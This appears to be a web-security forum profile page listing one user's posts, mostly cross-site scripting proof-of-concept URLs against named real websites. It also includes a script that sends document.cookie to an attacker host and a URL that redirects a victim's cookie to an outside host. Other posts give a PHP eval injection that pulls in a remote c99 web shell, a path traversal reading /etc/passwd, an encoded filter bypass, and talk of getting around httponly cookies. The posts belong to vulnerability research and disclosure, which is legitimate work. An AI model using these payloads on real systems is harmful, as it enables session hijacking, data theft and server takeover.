Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 

Page 1 of 2 (results 1 - 30 of 35)
7 years ago
beford
http://www.mozilla.org/security/announce/2007/mfsa2007-02.html http://ha.ckers.org/xss.html#XSS_Non_alpha_non_digit2 You probably want to filter out document.location, top.location, self.location
Forum: Projects
7 years ago
beford
hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22window.location='ht'%2b'tp://google.com/?'%2bdocument.cookie Affects Firefox 2.x < 2.0.0.2 Firefox 1.5x < 1.5.10 :P
Forum: Projects
7 years ago
beford
http://phpids.heideri.ch/?test=\..\..\..\thisfile
Forum: Projects
6 years ago
beford
If you try something like: http://comicfury.com/search.php?s=%3Cscript%3E it'll return a 503 Apache error; I guess that'll protect against most of the obvious attacks. However: http://comicfury.com/forum/viewforum.php/%27%22%3E%3Cimg%20src=1%20onerror=alert(/xss/)%3E?id=3 PHP_SELF XSS
Forum: XSS Info
6 years ago
beford
I'm using a ZyXEL P-660HW Series http://www.zyxel.com/web/product_family_detail.php?PC1indexflag=20040812093058&CategoryGroupNo=AC5783AE-9475-41AD-BDA5-0997187F44AA . There is a lot of CSRF stuff on this router: it can be used to change DNS servers, add keywords to the banned list on URL, it's also affected by the IP-based session management attacks mentioned on gnucitizen, and to authenticate yo
Forum: News and Links
7 years ago
beford
http://www.real.com/dmm/superpass/haokan/english?pageid=broadBandHomePage_3&pageregion=bottom_region&src=realhome_bb_3_1_1_0_0_1_0%22%3E%3Ch4%3Ex&pcode=rn%22%3E%3C/a%3E%3C/a%3E%3Ca%20href=%22http://blog.beford.org/%22%3Ebeford.org%3C/a%3E%3Cnoscript%3E&opage=realhome_bb
Forum: Full Disclosure
7 years ago
beford
http://www.google.com/reviews/polls/display/159769971366811755/blogger_template/vote?purl=blogspot.com%2F&chrtclr=%23599be2&hideq=false&font=normal+normal+100%25+Helvetica%2CArial%2CVerdana%2C%20Trebuchet+MS%20%2C+Sans-serif&u_tz=%22%3EXSS I've added 2 pocs on my (new :P) blog http://blog.beford.org/?p=3 I'd consider that one of them is kinda scary.
Forum: Full Disclosure
7 years ago
beford
It's cool to see how this evolved from 'not a bug, a feature' :) Congrats Gareth.
Forum: Full Disclosure
7 years ago
beford
z:\ is just a symlink to / so if you open z:\etc\passwd it's opening /etc/passwd. You need to check the address bar on the screenshot, not the window title. I'm opening 'z:\home\beford\Desktop\foobar%2F..%2F..%2F..%2Fetc%2Fpasswd' not 'z:\etc\passwd'.
Forum: Full Disclosure
7 years ago
beford
Ronald Wrote:
> Ahm... in case I don't get it: this is pretty normal in Linux, you just browse the file like any other, and there isn't a \etc\ dir on Windows so that would never work on a Windows machine.
>
> Or am I missing the point?

The point is that it should not display my /etc/passwd, It should instea
Forum: Full Disclosure
7 years ago
beford
So I was bored the other day without internet access, started messing around with Gnome VFS and noticed that some apps (like fspot) were urldecoding the names of the files that you 'drag&drop'ed to them. This is what I got after a while. http://beford.org/wineie.jpg I think that it's more like a wine issue because I couldn't reproduce the problem on Windows, however not all Windows Apps on Win
Forum: Full Disclosure
7 years ago
beford
The screenshot is small but it's kind of obvious that the bug is somehow related to the iphone interface recently released www.digg.com/iphone
Forum: XSS Info
7 years ago
beford
It seems like you can't use quotes, and the url link gets 'htmlized', so try something like: <body onload=eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,32,102,116,119,33,34,41))>
Forum: XSS Info
7 years ago
beford
http://www.sanity.com.au/search/advanced.asp?failed=Y&v=&price_less_than=500&availability=All&released_from=1980&released_to=2007&artist=%22%3E%3Ch4%3Exss1&title=%22%3E%3Ch4%3Exss2&song=%22%3E%3Ch4%3Exss3&department=All&format=All&sort=
Forum: XSS Info
7 years ago
beford
Nice paper, however you didn't include DUH (DUMP URL HANDLERS) in the appendix section (as the paper claimed).
Forum: Full Disclosure
7 years ago
beford
christ1an Wrote:
> I apologize for my offense beford. I never intended to make such a big deal about this. The fact is, I contacted them a couple of times without receiving an answer. At the same time, the number of vulnerabilities rose each week or so. So I had to force them to contact me. The only way to
Forum: Full Disclosure
7 years ago
beford
christ1an Wrote:
> Beford if you really think so, please go back off in your corner. Obviously you did not understand a thing about all this.

I don't understand why you need to make it a big deal; you claim that they didn't answer your mails, did you contact them at their official address security@google.com? Last vulnerab
Forum: Full Disclosure
7 years ago
beford
I'm a bit late to this thread, however I'm not sure if I'm the only one that thinks this about the post:
Forum: Full Disclosure
7 years ago
beford
<script> xi=new Image(); xi.src="http://www.myevilsite.com/cookiestealer.php?"+document.cookie; </script>
Forum: XSS Info
7 years ago
beford
heh yea, I read about that on digg.com; at first I thought that the attacker had hijacked the domain name, because that was the title of the post. You can see here the mirror of the deface http://duggmirror.com/security/Netscape_Hacked_By_Digg/ if you disable scripting for duggmirror and view source, you can check where the script injection was done.
Forum: News and Links
7 years ago
beford
AFAIK Mozilla Corp/Org get money from Google. http://www.internetnews.com/dev-news/article.php/3590756
Forum: Search Engine Hacking and SEO
7 years ago
beford
I've just noticed this: when you use Opera's internal source code viewer, it fails to display the whole html code if the page contains a NULL (0x00) char. It's not a big deal, but it can be abused to hide evil javascript code from Opera users. I've just tested this in Opera for Windows. http://beford.org/xss/opera.php I was looking for previous references for this issue, only this came on a quick
Forum: XSS Info
7 years ago
beford
?query=";eval($_GET);//&a=include('http://no.spam.ee/~tonu/phpshell/c99shell.txt'); You can replace the txt file with your own php code, it requires allow_url_fopen to be enabled though.
Forum: SQL and Code Injection
7 years ago
beford
";eval($a);// needs register_globals on though. It's easier if you check the php source code and find another variable that gets assigned from $_GET/$_POST/$_COOKIE/$_REQUEST/$_SERVER['HTTP_XX']; then you can use it with the eval function, and it'll work regardless of the register_globals configuration.
Forum: SQL and Code Injection
7 years ago
beford
just wondering, does this XSS affect logged users?
Forum: XSS Info
7 years ago
beford
http://www.youtube.com/watch?v=8zEQhhaJsU4
Forum: OMG Ponies
7 years ago
beford
http://groups.yahoo.com/convacct?email=owned%40gmail.com&list=tux%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Forum: Full Disclosure
7 years ago
beford
I don't have an account to test it, but, did you try it with opera? Opera users might be vulnerable to this.
Forum: XSS Info
7 years ago
beford
> Not sure what you were trying to do, but this works in IE, FF and Opera:
>
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22%3e%3cscript%3ealert(1)%3c/script%3e%3cinput
>
> Added a dead input tag to hide the maxlength attribute on the search box that gets orphaned on the injection.

Looks like apidoc.digg.com is using a WikiLike software from www
Forum: Full Disclosure
7 years ago
beford
I've just noticed that Microsoft enabled httponly cookies for the MSPAuth and MSPProf hotmail cookies, which is, erm, good. Oh well, I guess that we won't be able to XSS hotmail IE users. Firefox and Opera users are still vulnerable though. Anybody else noticed this? How could I bypass this httponly restriction? :P
Forum: XSS Info